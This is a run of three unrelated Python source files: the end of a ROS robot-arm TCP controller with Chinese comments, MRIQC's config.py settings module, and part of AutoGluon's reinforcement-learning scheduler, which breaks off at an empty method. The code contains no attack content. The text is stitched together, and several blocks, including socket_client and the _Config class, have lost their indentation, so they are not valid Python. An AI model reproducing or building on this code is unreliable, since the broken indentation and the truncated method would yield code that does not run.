    #c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
    print ("Ready to connect")
    rospy.spin() ## block and process callbacks until shutdown
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
    """Translate the pending socket_cmd/pos state into a TCP command and send it.

    Dispatches on socket_cmd.action (PtP / Line / SetVel / Delay / Mode)
    and, for motion commands, on the control mode in socket_cmd.setboth.
    Only acts when arm_mode_flag is set; resets the action to 5 (idle)
    after building the command.

    NOTE(review): the inner loops reuse the name ``case``, shadowing the
    outer switch; each inner ``break`` only exits the inner switch.
    NOTE(review): if no case assigns ``data`` the final Socket.send would
    raise UnboundLocalError — confirm action is always a handled value here.
    """
    global arm_mode_flag,speed_mode_flag,point_data_flag
    if arm_mode_flag == True:
        arm_mode_flag = False
        for case in switch(socket_cmd.action):
            #-------PtP motion command--------
            if case(Taskcmd.Action_Type.PtoP):
                # pick the control mode (position / Euler / both)
                for case in switch(socket_cmd.setboth):
                    if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                        data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                        break
                    if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                        data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                        break
                    if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                        data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                        break
                break
            #-------Line motion command--------
            if case(Taskcmd.Action_Type.Line):
                for case in switch(socket_cmd.setboth):
                    if case(Taskcmd.Ctrl_Mode.CTRL_POS):
                        data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
                        break
                    if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
                        data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                        break
                    if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
                        data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
                        break
                break
            #-------set arm speed--------
            if case(Taskcmd.Action_Type.SetVel):
                data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
                break
            #-------set arm delay time--------
            if case(Taskcmd.Action_Type.Delay):
                data = TCP.SetDelay(socket_cmd.grip,0)
                break
            #-------set arm fast/safe speed mode--------
            if case(Taskcmd.Action_Type.Mode):
                data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
                break
        socket_cmd.action= 5 ## reset to the idle/initial mode state
        Socket.send(data.encode('utf-8'))  # send over the socket (encoded for Python str transport)
        # Socket_sent_flag = True
        # socket_client_sent_flag(Socket_sent_flag)
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
#print(2222222222)
Socket_sent_flag = False
socket_client_sent_flag(Socket_sent_flag)
if str(feedback_str[4]) == '49':#回傳1 true
#print(111111111111)
Socket_sent_flag = True
socket_client_sent_flag(Socket_sent_flag)
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
    """Thread entry point: runs the blocking socket-client loop."""
    socket_client()
## 多執行序 end
def myhook():
    """rospy shutdown hook: announce that the node is stopping."""
    print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 5  ## reset to the initial mode state
    # Run the TCP client on a background thread while the server blocks here.
    t = threading.Thread(target=thread_test)
    t.start()  # start the background socket-client thread
    socket_server()
    t.join()
config.py | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
#
# Copyright 2021 The NiPreps Developers <nipreps@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# We support and encourage derived works from this project, please read
# about our expectations at
#
# https://www.nipreps.org/community/licensing/
#
r"""
A Python module to maintain unique, run-wide *MRIQC* settings.
This module implements the memory structures to keep a consistent, singleton config.
Settings are passed across processes via filesystem, and a copy of the settings for
each run and subject is left under
``<output_dir>/sub-<participant_id>/log/<run_unique_id>/mriqc.toml``.
Settings are stored using :abbr:`ToML (Tom's Markup Language)`.
The module has a :py:func:`~mriqc.config.to_filename` function to allow writing out
the settings to hard disk in *ToML* format, which looks like:
.. literalinclude:: ../mriqc/data/config-example.toml
:language: toml
:name: mriqc.toml
:caption: **Example file representation of MRIQC settings**.
This config file is used to pass the settings across processes,
using the :py:func:`~mriqc.config.load` function.
Configuration sections
----------------------
.. autoclass:: environment
:members:
.. autoclass:: execution
:members:
.. autoclass:: workflow
:members:
.. autoclass:: nipype
:members:
Usage
-----
A config file is used to pass settings and collect information as the execution
graph is built across processes.
.. code-block:: Python
from mriqc import config
config_file = mktemp(dir=config.execution.work_dir, prefix='.mriqc.', suffix='.toml')
config.to_filename(config_file)
# Call build_workflow(config_file, retval) in a subprocess
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
config.load(config_file)
# Access configs from any code section as:
value = config.section.setting
Logging
-------
.. autoclass:: loggers
:members:
Other responsibilities
----------------------
The :py:mod:`config` is responsible for other convenience actions.
* Switching Python's :obj:`multiprocessing` to *forkserver* mode.
* Set up a filter for warnings as early as possible.
* Automated I/O magic operations. Some conversions need to happen in the
store/load processes (e.g., from/to :obj:`~pathlib.Path` \<-\> :obj:`str`,
:py:class:`~bids.layout.BIDSLayout`, etc.)
"""
import os
import sys
from pathlib import Path
from time import strftime
from uuid import uuid4
try:
# This option is only available with Python 3.8
from importlib.metadata import version as get_version
except ImportError:
from importlib_metadata import version as get_version
# Ignore annoying warnings
from mriqc._warnings import logging
__version__ = get_version("mriqc")
# Snapshot of the environment *before* MRIQC mutates it below; it is exposed
# as ``environment._pre_mriqc`` and restored by ``restore_env()``.
_pre_exec_env = dict(os.environ)
# Reduce numpy's vms by limiting OMP_NUM_THREADS
_default_omp_threads = int(os.getenv("OMP_NUM_THREADS", os.cpu_count()))
# Disable NiPype etelemetry always
_disable_et = bool(
    os.getenv("NO_ET") is not None or os.getenv("NIPYPE_NO_ET") is not None
)
os.environ["NIPYPE_NO_ET"] = "1"
os.environ["NO_ET"] = "1"
if not hasattr(sys, "_is_pytest_session"):
    sys._is_pytest_session = False # Trick to avoid sklearn's FutureWarnings
# Disable all warnings in main and children processes only on production versions
if not any(
    (
        "+" in __version__,
        __version__.endswith(".dirty"),
        os.getenv("MRIQC_DEV", "0").lower() in ("1", "on", "true", "y", "yes"),
    )
):
    os.environ["PYTHONWARNINGS"] = "ignore"
logging.addLevelName(25, "IMPORTANT") # Add a new level between INFO and WARNING
logging.addLevelName(15, "VERBOSE") # Add a new level between INFO and DEBUG
DEFAULT_MEMORY_MIN_GB = 0.01
DSA_MESSAGE = """\
IMPORTANT: Anonymized quality metrics (IQMs) will be submitted to MRIQC's metrics \
repository. \
Submission of IQMs can be disabled using the ``--no-sub`` argument. \
Please visit https://mriqc.readthedocs.io/en/latest/dsa.html to revise MRIQC's \
Data Sharing Agreement."""
_exec_env = os.name
_docker_ver = None
# special variable set in the container
if os.getenv("IS_DOCKER_8395080871"):
    _exec_env = "singularity"
    _cgroup = Path("/proc/1/cgroup")
    # Distinguish Docker from other container runtimes via cgroup contents.
    if _cgroup.exists() and "docker" in _cgroup.read_text():
        _docker_ver = os.getenv("DOCKER_VERSION_8395080871")
        _exec_env = "docker"
    del _cgroup
_templateflow_home = Path(
    os.getenv(
        "TEMPLATEFLOW_HOME",
        os.path.join(os.getenv("HOME"), ".cache", "templateflow"),
    )
)
try:
    from psutil import virtual_memory
    _free_mem_at_start = round(virtual_memory().free / 1024**3, 1)
except Exception:
    # psutil is optional; report "unknown" when it is unavailable.
    _free_mem_at_start = None
_oc_limit = "n/a"
_oc_policy = "n/a"
try:
    # Memory policy may have a large effect on types of errors experienced
    _proc_oc_path = Path("/proc/sys/vm/overcommit_memory")
    if _proc_oc_path.exists():
        _oc_policy = {"0": "heuristic", "1": "always", "2": "never"}.get(
            _proc_oc_path.read_text().strip(), "unknown"
        )
        if _oc_policy != "never":
            _proc_oc_kbytes = Path("/proc/sys/vm/overcommit_kbytes")
            if _proc_oc_kbytes.exists():
                _oc_limit = _proc_oc_kbytes.read_text().strip()
            if (
                _oc_limit in ("0", "n/a")
                and Path("/proc/sys/vm/overcommit_ratio").exists()
            ):
                _oc_limit = "{}%".format(
                    Path("/proc/sys/vm/overcommit_ratio").read_text().strip()
                )
except Exception:
    pass
# Total physical memory in GB, probed per platform (None when undetectable).
_memory_gb = None
try:
    if "linux" in sys.platform:
        with open("/proc/meminfo", "r") as f_in:
            _meminfo_lines = f_in.readlines()
        _mem_total_line = [line for line in _meminfo_lines if "MemTotal" in line][0]
        _mem_total = float(_mem_total_line.split()[1])
        _memory_gb = _mem_total / (1024.0**2)
    elif "darwin" in sys.platform:
        _mem_str = os.popen("sysctl hw.memsize").read().strip().split(" ")[-1]
        _memory_gb = float(_mem_str) / (1024.0**3)
except Exception:
    pass
class _Config:
"""An abstract class forbidding instantiation."""
_paths = tuple()
def __init__(self):
"""Avert instantiation."""
raise RuntimeError("Configuration type is not instantiable.")
@classmethod
def load(cls, settings, init=True):
"""Store settings from a dictionary."""
for k, v in settings.items():
if v is None:
continue
if k in cls._paths:
setattr(cls, k, Path(v).absolute())
continue
if hasattr(cls, k):
setattr(cls, k, v)
if init:
try:
cls.init()
except AttributeError:
pass
@classmethod
def get(cls):
"""Return defined settings."""
out = {}
for k, v in cls.__dict__.items():
if k.startswith("_") or v is None:
continue
if callable(getattr(cls, k)):
continue
if k in cls._paths:
v = str(v)
out[k] = v
return out
class environment(_Config):
    """
    Read-only options regarding the platform and environment.
    Crawls runtime descriptive settings (e.g., default FreeSurfer license,
    execution environment, nipype and *MRIQC* versions, etc.).
    The ``environment`` section is not loaded in from file,
    only written out when settings are exported.
    This config section is useful when reporting issues,
    and these variables are tracked whenever the user does not
    opt-out using the ``--notrack`` argument.
    """
    # All values below are captured once, at module import time.
    cpu_count = os.cpu_count()
    """Number of available CPUs."""
    exec_docker_version = _docker_ver
    """Version of Docker Engine."""
    exec_env = _exec_env
    """A string representing the execution platform."""
    free_mem = _free_mem_at_start
    """Free memory at start."""
    overcommit_policy = _oc_policy
    """Linux's kernel virtual memory overcommit policy."""
    overcommit_limit = _oc_limit
    """Linux's kernel virtual memory overcommit limits."""
    nipype_version = get_version("nipype")
    """Nipype's current version."""
    templateflow_version = get_version("templateflow")
    """The TemplateFlow client version installed."""
    total_memory = _memory_gb
    """Total memory available, in GB."""
    version = __version__
    """*MRIQC*'s version."""
    # Snapshot of os.environ taken before MRIQC mutated it; restore_env()
    # re-installs it when the run finishes.
    _pre_mriqc = _pre_exec_env
    """Environment variables before MRIQC's execution."""
class nipype(_Config):
    """Nipype settings."""
    crashfile_format = "txt"
    """The file format for crashfiles, either text or pickle."""
    get_linked_libs = False
    """Run NiPype's tool to enlist linked libraries for every interface."""
    local_hash_check = True
    """Check if interface is cached locally before executing."""
    memory_gb = None
    """Estimation in GB of the RAM this workflow can allocate at any given time."""
    nprocs = os.cpu_count()
    """Number of processes (compute tasks) that can be run in parallel (multiprocessing only)."""
    omp_nthreads = _default_omp_threads
    """Number of CPUs a single process can access for multithreaded execution."""
    plugin = "MultiProc"
    """NiPype's execution plugin."""
    plugin_args = {
        "maxtasksperchild": 1,
        "raise_insufficient": False,
    }
    """Settings for NiPype's execution plugin."""
    remove_node_directories = False
    """Remove directories whose outputs have already been used up."""
    resource_monitor = False
    """Enable resource monitor."""
    stop_on_first_crash = True
    """Whether the workflow should stop or continue after the first error."""
    @classmethod
    def get_plugin(cls):
        """Format a dictionary for Nipype consumption."""
        out = {
            "plugin": cls.plugin,
            # Shallow-copy the class-level dict: returning ``cls.plugin_args``
            # itself let the per-run keys added below (``n_procs``,
            # ``memory_gb``) leak back into the shared class attribute.
            "plugin_args": dict(cls.plugin_args),
        }
        if cls.plugin in ("MultiProc", "LegacyMultiProc"):
            out["plugin_args"]["n_procs"] = int(cls.nprocs)
            if cls.memory_gb:
                out["plugin_args"]["memory_gb"] = float(cls.memory_gb)
        return out
    @classmethod
    def init(cls):
        """Set NiPype configurations."""
        from nipype import config as ncfg
        # Nipype config (logs and execution)
        ncfg.update_config(
            {
                "execution": {
                    "crashdump_dir": str(execution.log_dir),
                    "crashfile_format": cls.crashfile_format,
                    "get_linked_libs": cls.get_linked_libs,
                    "stop_on_first_crash": cls.stop_on_first_crash,
                }
            }
        )
class execution(_Config):
    """Configure run-level settings."""
    ants_float = False
    """Use float number precision for ANTs computations."""
    bids_dir = None
    """An existing path to the dataset, which must be BIDS-compliant."""
    bids_database_dir = None
    """Path to the directory containing SQLite database indices for the input BIDS dataset."""
    bids_description_hash = None
    """Checksum (SHA256) of the ``dataset_description.json`` of the BIDS dataset."""
    cwd = os.getcwd()
    """Current working directory."""
    debug = False
    """Run in sloppy mode (meaning, suboptimal parameters that minimize run-time)."""
    dry_run = False
    """Just test, do not run."""
    dsname = "<unset>"
    """A dataset name used when generating files from the rating widget."""
    echo_id = None
    """Select a particular echo for multi-echo EPI datasets."""
    float32 = True
    """Cast the input data to float32 if it's represented with higher precision."""
    layout = None
    """A :py:class:`~bids.layout.BIDSLayout` object, see :py:func:`init`."""
    log_dir = None
    """The path to a directory that contains execution logs."""
    log_level = 25
    """Output verbosity."""
    modalities = None
    """Filter input dataset by MRI type."""
    no_sub = False
    """Turn off submission of anonymized quality metrics to Web API."""
    output_dir = None
    """Folder where derivatives will be stored."""
    participant_label = None
    """List of participant identifiers that are to be preprocessed."""
    pdb = False
    """Drop into PDB when exceptions are encountered."""
    reports_only = False
    """Only build the reports, based on the reportlets found in a cached working directory."""
    resource_monitor = False
    """Enable resource monitor."""
    run_id = None
    """Filter input dataset by run identifier."""
    run_uuid = "%s_%s" % (strftime("%Y%m%d-%H%M%S"), uuid4())
    """Unique identifier of this particular run."""
    session_id = None
    """Filter input dataset by session identifier."""
    task_id = None
    """Select a particular task from all available in the dataset."""
    templateflow_home = _templateflow_home
    """The root folder of the TemplateFlow client."""
    upload_strict = False
    """Workflow will crash if upload is not successful."""
    verbose_reports = False
    """Generate extended reports."""
    webapi_url = "https://mriqc.nimh.nih.gov/api/v1"
    """IP address where the MRIQC WebAPI is listening."""
    webapi_port = None
    """port where the MRIQC WebAPI is listening."""
    work_dir = Path("work").absolute()
    """Path to a working directory where intermediate results will be available."""
    write_graph = False
    """Write out the computational graph corresponding to the planned preprocessing."""
    # Private cache for the BIDSLayout created by init(); exposed as ``layout``.
    _layout = None
    # Keys coerced to absolute Path objects by _Config.load(). Some entries
    # (e.g. "fs_license_file") have no class default above and only appear
    # when present in the loaded settings.
    _paths = (
        "anat_derivatives",
        "bids_dir",
        "bids_database_dir",
        "fs_license_file",
        "fs_subjects_dir",
        "layout",
        "log_dir",
        "output_dir",
        "templateflow_home",
        "work_dir",
    )
    @classmethod
    def init(cls):
        """Create a new BIDS Layout accessible with :attr:`~execution.layout`."""
        if cls._layout is None:
            import re
            from bids.layout.index import BIDSLayoutIndexer
            from bids.layout import BIDSLayout
            # Reuse a user-provided index when given; else build one per run
            # under the working directory.
            _db_path = cls.bids_database_dir or (
                cls.work_dir / cls.run_uuid / "bids_db"
            )
            _db_path.mkdir(exist_ok=True, parents=True)
            # Recommended after PyBIDS 12.1
            _indexer = BIDSLayoutIndexer(
                validate=False,
                ignore=(
                    "code",
                    "stimuli",
                    "sourcedata",
                    "models",
                    "derivatives",
                    "scripts",
                    re.compile(r"^\."),
                    # Exclude modalities and contrasts ignored by MRIQC (doesn't know how to QC)
                    re.compile(
                        r"sub-[a-zA-Z0-9]+(/ses-[a-zA-Z0-9]+)?/(dwi|fmap|perf)/"
                    ),
                    re.compile(
                        r"sub-[a-zA-Z0-9]+(/ses-[a-zA-Z0-9]+)?/anat/.*_"
                        r"(PDw|T2starw|FLAIR|inplaneT1|inplaneT2|PDT2|angio|T2star"
                        r"|FLASH|PD|T1map|T2map|T2starmap|R1map|R2map|R2starmap|PDmap"
                        r"|MTRmap|MTsat|UNIT1|T1rho|MWFmap|MTVmap|PDT2map|Chimap"
                        r"|S0map|M0map|defacemask|MESE|MEGRE|VFA|IRT1|MP2RAGE|MPM|MTS|MTR)\."
                    ),
                    re.compile(
                        r"sub-[a-zA-Z0-9]+(/ses-[a-zA-Z0-9]+)?/func/.*"
                        r"_(cbv|sbref|phase|events|physio|stim)\."
                    ),
                ),
            )
            cls._layout = BIDSLayout(
                str(cls.bids_dir),
                database_path=_db_path,
                # Only re-index when the database was built by this run.
                reset_database=cls.bids_database_dir is None,
                indexer=_indexer,
            )
            cls.bids_database_dir = _db_path
        cls.layout = cls._layout
# These module-level scratch values have been captured by the config classes
# above and are not necessary anymore.
del _exec_env
del _templateflow_home
del _free_mem_at_start
del _oc_limit
del _oc_policy
class workflow(_Config):
    """Configure the particular execution graph of this workflow."""
    # Values below are defaults; they may be overwritten via _Config.load().
    analysis_level = ["participant"]
    """Level of analysis."""
    biggest_file_gb = 1
    """Size of largest file in GB."""
    correct_slice_timing = False
    """Perform slice timing correction."""
    deoblique = False
    """Deoblique the functional scans during head motion correction preprocessing."""
    despike = False
    """Despike the functional scans during head motion correction preprocessing."""
    fd_thres = 0.2
    """Threshold on Framewise Displacement estimates to detect outliers."""
    fd_radius = 50
    """Radius in mm. of the sphere for the FD calculation."""
    fft_spikes_detector = False
    """Turn on FFT based spike detector (slow)."""
    headmask = "BET"
    """Use FSL BET in :py:func:`~mriqc.workflows.anatomical.headmsk_wf`."""
    ica = False
    """Run ICA on the raw data and include the components in the individual reports."""
    inputs = None
    """List of files to be processed with MRIQC."""
    species = "human"
    """Subject species to choose most appropriate template"""
    template_id = "MNI152NLin2009cAsym"
    """TemplateFlow ID of template used for the anatomical processing."""
class loggers:
    """Keep loggers easily accessible (see :py:func:`init`)."""

    _fmt = "%(asctime)s,%(msecs)d %(name)-2s " "%(levelname)-2s:\n\t %(message)s"
    _datefmt = "%y%m%d-%H:%M:%S"
    # Guards the one-time nipype wiring performed by init().
    _init = False
    default = logging.getLogger()
    """The root logger."""
    cli = logging.getLogger("cli")
    """Command-line interface logging."""
    workflow = None
    """NiPype's workflow logger."""
    interface = None
    """NiPype's interface logger."""
    utils = None
    """NiPype's utils logger."""

    @classmethod
    def init(cls):
        """
        Set the log level, initialize all loggers into :py:class:`loggers`.
        * Add new logger levels (25: IMPORTANT, and 15: VERBOSE).
        * Add a new sub-logger (``cli``).
        * Logger configuration.
        """
        if not cls._init:
            from nipype import logging as nlogging
            from nipype import config as ncfg
            cls.workflow = nlogging.getLogger("nipype.workflow")
            cls.interface = nlogging.getLogger("nipype.interface")
            cls.utils = nlogging.getLogger("nipype.utils")
            if not len(cls.cli.handlers):
                _handler = logging.StreamHandler(stream=sys.stdout)
                _handler.setFormatter(
                    logging.Formatter(fmt=cls._fmt, datefmt=cls._datefmt)
                )
                cls.cli.addHandler(_handler)
            ncfg.update_config(
                {
                    "logging": {
                        "log_directory": str(execution.log_dir),
                        "log_to_file": True,
                    },
                }
            )
            cls._init = True
        # Levels are (re)applied on every call so changing
        # execution.log_level takes effect.
        cls.default.setLevel(execution.log_level)
        cls.cli.setLevel(execution.log_level)
        cls.interface.setLevel(execution.log_level)
        cls.workflow.setLevel(execution.log_level)
        cls.utils.setLevel(execution.log_level)

    @classmethod
    def getLogger(cls, name):
        """Return (and cache) the logger called *name*, creating it if needed."""
        retval = getattr(cls, name)
        if retval is None:
            # Bind the new logger to ``retval`` *before* configuring it; the
            # previous code only assigned the class attribute and then called
            # ``retval.addHandler`` while ``retval`` was still None, raising
            # AttributeError on this path.
            retval = logging.getLogger(name)
            setattr(cls, name, retval)
            _handler = logging.StreamHandler(stream=sys.stdout)
            _handler.setFormatter(logging.Formatter(fmt=cls._fmt, datefmt=cls._datefmt))
            retval.addHandler(_handler)
            retval.setLevel(execution.log_level)
        return retval
def from_dict(settings):
    """Read settings from a flat dictionary."""
    # execution and workflow run their init() hooks; nipype must not.
    for section in (execution, workflow):
        section.load(settings)
    nipype.load(settings, init=False)
def load(filename):
    """Load settings from a TOML file on disk."""
    from toml import loads
    settings = loads(Path(filename).read_text())
    for sectionname, configs in settings.items():
        if sectionname == "environment":
            # The environment section is descriptive-only; never read back in.
            continue
        getattr(sys.modules[__name__], sectionname).load(configs)
def get(flat=False):
    """Get config as a dict, optionally flattened to ``section.key`` pairs."""
    settings = {
        "environment": environment.get(),
        "execution": execution.get(),
        "workflow": workflow.get(),
        "nipype": nipype.get(),
    }
    if flat:
        return {
            f"{section}.{key}": value
            for section, configs in settings.items()
            for key, value in configs.items()
        }
    return settings
def dumps():
    """Serialize the current configuration into a TOML string."""
    from toml import dumps as toml_dumps
    return toml_dumps(get())
def to_filename(filename):
    """Write the current settings to *filename*, creating parent folders."""
    out_file = Path(filename)
    out_file.parent.mkdir(exist_ok=True, parents=True)
    out_file.write_text(dumps())
def _process_initializer(cwd, omp_nthreads):
"""Initialize the environment of the child process."""
os.chdir(cwd)
os.environ["NIPYPE_NO_ET"] = "1"
os.environ["OMP_NUM_THREADS"] = f"{omp_nthreads}"
def restore_env():
    """Restore the environment to its state before MRIQC started.

    Clears ``os.environ`` entirely and repopulates it from the snapshot
    taken at import time (:attr:`environment._pre_mriqc`).
    """
    # Materialize the key list first: deleting entries while iterating the
    # live ``os.environ.keys()`` view raises RuntimeError (mapping changed
    # size during iteration).
    for k in list(os.environ.keys()):
        del os.environ[k]
    for k, v in environment._pre_mriqc.items():
        os.environ[k] = v
|
rl_scheduler.py | import os
import json
import time
import pickle
import logging
import threading
import multiprocessing as mp
from collections import OrderedDict
import mxnet as mx
from .resource import DistributedResource
from ..utils import (save, load, mkdir, try_import_mxboard, tqdm)
from ..core import Task
from ..core.decorator import _autogluon_method
from ..searcher import RLSearcher
from .fifo import FIFOScheduler
from .reporter import DistStatusReporter
__all__ = ['RLScheduler']
logger = logging.getLogger(__name__)
class RLScheduler(FIFOScheduler):
    r"""Scheduler that uses Reinforcement Learning with a LSTM controller created based on the provided search spaces

    Parameters
    ----------
    train_fn : callable
        A task launch function for training. Note: please add the `@ag.args` decorater to the original function.
    args : object (optional)
        Default arguments for launching train_fn.
    resource : dict
        Computation resources. For example, `{'num_cpus':2, 'num_gpus':1}`
    searcher : object (optional)
        Autogluon searcher. For example, autogluon.searcher.RandomSearcher
    time_attr : str
        A training result attr to use for comparing time.
        Note that you can pass in something non-temporal such as
        `training_epoch` as a measure of progress, the only requirement
        is that the attribute should increase monotonically.
    reward_attr : str
        The training result objective value attribute. As with `time_attr`, this may refer to any objective value.
        Stopping procedures will use this attribute.
    controller_resource : int
        Batch size for training controllers.
    dist_ip_addrs : list of str
        IP addresses of remote machines.

    Examples
    --------
    >>> import numpy as np
    >>> import autogluon as ag
    >>>
    >>> @ag.args(
    ...     lr=ag.space.Real(1e-3, 1e-2, log=True),
    ...     wd=ag.space.Real(1e-3, 1e-2))
    >>> def train_fn(args, reporter):
    ...     print('lr: {}, wd: {}'.format(args.lr, args.wd))
    ...     for e in range(10):
    ...         dummy_accuracy = 1 - np.power(1.8, -np.random.uniform(e, 2*e))
    ...         reporter(epoch=e+1, accuracy=dummy_accuracy, lr=args.lr, wd=args.wd)
    ...
    >>> scheduler = ag.scheduler.RLScheduler(train_fn,
    ...                                      resource={'num_cpus': 2, 'num_gpus': 0},
    ...                                      num_trials=20,
    ...                                      reward_attr='accuracy',
    ...                                      time_attr='epoch')
    >>> scheduler.run()
    >>> scheduler.join_jobs()
    >>> scheduler.get_training_curves(plot=True)
    """
    def __init__(self, train_fn, args=None, resource=None, searcher=None, checkpoint='./exp/checkpoint.ag',
                 resume=False, num_trials=None, time_attr='epoch', reward_attr='accuracy',
                 visualizer='none', controller_lr=1e-3, ema_baseline_decay=0.95,
                 controller_resource=None,
                 controller_batch_size=1,
                 dist_ip_addrs=None, sync=True, **kwargs):
        assert isinstance(train_fn, _autogluon_method), 'Please use @ag.args ' + \
            'to decorate your training script.'
        # Mutable containers must not be default argument values; they would
        # be shared across every scheduler instance.
        if controller_resource is None:
            controller_resource = {'num_cpus': 0, 'num_gpus': 0}
        if dist_ip_addrs is None:
            dist_ip_addrs = []
        self.ema_baseline_decay = ema_baseline_decay
        self.sync = sync
        # create RL searcher/controller
        if not isinstance(searcher, RLSearcher):
            searcher = RLSearcher(
                train_fn.kwspaces, reward_attribute=reward_attr)
        # resume=False on purpose: resuming is handled below, once the
        # controller and its optimizer exist.
        super(RLScheduler, self).__init__(
            train_fn, train_fn.args, resource, searcher,
            checkpoint=checkpoint, resume=False, num_trials=num_trials,
            time_attr=time_attr, reward_attr=reward_attr,
            visualizer=visualizer, dist_ip_addrs=dist_ip_addrs, **kwargs)
        # reserve controller computation resource on master node
        master_node = self.remote_manager.get_master_node()
        self.controller_resource = DistributedResource(**controller_resource)
        assert self.resource_manager.reserve_resource(
            master_node, self.controller_resource), 'Not Enough Resource on Master Node' + \
            ' for Training Controller'
        self.controller_ctx = [mx.gpu(i) for i in self.controller_resource.gpu_ids] if \
            controller_resource['num_gpus'] > 0 else [mx.cpu()]
        # controller setup
        self.controller = searcher.controller
        self.controller.collect_params().reset_ctx(self.controller_ctx)
        self.controller_optimizer = mx.gluon.Trainer(
            self.controller.collect_params(), 'adam',
            optimizer_params={'learning_rate': controller_lr*controller_batch_size})
        self.controller_batch_size = controller_batch_size
        self.baseline = None
        self.lock = mp.Lock()
        # async buffers (shared counters across reporter threads)
        if not sync:
            self.mp_count = mp.Value('i', 0)
            self.mp_seed = mp.Value('i', 0)
            self.mp_fail = mp.Value('i', 0)
        if resume:
            if os.path.isfile(checkpoint):
                self.load_state_dict(load(checkpoint))
            else:
                msg = 'checkpoint path {} is not available for resume.'.format(checkpoint)
                logger.exception(msg)

    def run(self, **kwargs):
        """Run multiple number of trials
        """
        self.num_trials = kwargs.get('num_trials', self.num_trials)
        logger.info('Starting Experiments')
        logger.info('Num of Finished Tasks is {}'.format(self.num_finished_tasks))
        logger.info('Num of Pending Tasks is {}'.format(self.num_trials - self.num_finished_tasks))
        if self.sync:
            self._run_sync()
        else:
            self._run_async()

    def _run_sync(self):
        """Synchronous loop: sample a batch of configs, train them, and apply
        one REINFORCE update to the controller per batch."""
        decay = self.ema_baseline_decay
        for i in tqdm(range(self.num_trials // self.controller_batch_size + 1)):
            with mx.autograd.record():
                # sample controller_batch_size number of configurations
                # The final iteration runs the leftover trials only.  (The
                # original computed ``self.num_trials % self.num_trials`` —
                # always 0 — so trailing trials were silently skipped whenever
                # num_trials was not a multiple of the batch size.)
                batch_size = self.num_trials % self.controller_batch_size \
                    if i == self.num_trials // self.controller_batch_size \
                    else self.controller_batch_size
                if batch_size == 0: continue
                configs, log_probs, entropies = self.controller.sample(
                    batch_size, with_details=True)
                # schedule the training tasks and gather the reward
                rewards = self.sync_schedule_tasks(configs)
                # subtract baseline
                if self.baseline is None:
                    self.baseline = rewards[0]
                avg_rewards = mx.nd.array([reward - self.baseline for reward in rewards],
                                          ctx=self.controller.context)
                # EMA baseline
                for reward in rewards:
                    self.baseline = decay * self.baseline + (1 - decay) * reward
                # negative policy gradient
                log_probs = log_probs.sum(axis=1)
                loss = - log_probs * avg_rewards#.reshape(-1, 1)
                loss = loss.sum()  # or loss.mean()
                # update
                loss.backward()
                self.controller_optimizer.step(batch_size)
                logger.debug('controller loss: {}'.format(loss.asscalar()))

    def _run_async(self):
        """Asynchronous loop: each trial runs in its own reporter thread and
        applies its own (lock-protected) controller update."""
